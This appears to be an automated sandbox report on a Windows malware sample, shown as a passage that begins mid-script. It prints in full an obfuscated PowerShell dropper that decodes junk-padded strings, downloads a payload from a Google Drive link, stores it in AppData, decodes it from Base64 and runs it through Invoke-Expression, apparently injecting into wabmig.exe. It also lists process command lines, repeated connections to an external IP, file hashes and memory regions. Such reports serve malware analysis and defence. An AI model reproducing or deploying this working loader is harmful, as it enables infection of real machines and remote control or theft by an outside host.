lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
NL 104.248.205.66:80 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp

Files

memory/4976-0-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idfk0znx.px4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4976-3-0x000002B71FF80000-0x000002B71FFA2000-memory.dmp

memory/4976-11-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-12-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-14-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

memory/4976-16-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-17-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4776-18-0x0000000002F80000-0x0000000002FB6000-memory.dmp

memory/4776-19-0x00000000059B0000-0x0000000005FD8000-memory.dmp

memory/4776-20-0x00000000058C0000-0x00000000058E2000-memory.dmp

memory/4776-21-0x0000000005FE0000-0x0000000006046000-memory.dmp

memory/4776-22-0x0000000006050000-0x00000000060B6000-memory.dmp

memory/4776-32-0x0000000006140000-0x0000000006494000-memory.dmp

memory/4776-33-0x00000000067A0000-0x00000000067BE000-memory.dmp

memory/4776-34-0x00000000067E0000-0x000000000682C000-memory.dmp

memory/4776-35-0x0000000007FB0000-0x000000000862A000-memory.dmp

memory/4776-36-0x0000000006D50000-0x0000000006D6A000-memory.dmp

memory/4776-37-0x0000000007A20000-0x0000000007AB6000-memory.dmp

memory/4776-38-0x00000000079D0000-0x00000000079F2000-memory.dmp

memory/4776-39-0x0000000008BE0000-0x0000000009184000-memory.dmp

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/4776-41-0x0000000009190000-0x000000000C536000-memory.dmp

memory/4976-42-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/3664-43-0x0000000000D00000-0x00000000040A6000-memory.dmp

memory/3664-57-0x0000000000D00000-0x00000000040A6000-memory.dmp

memory/4976-60-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61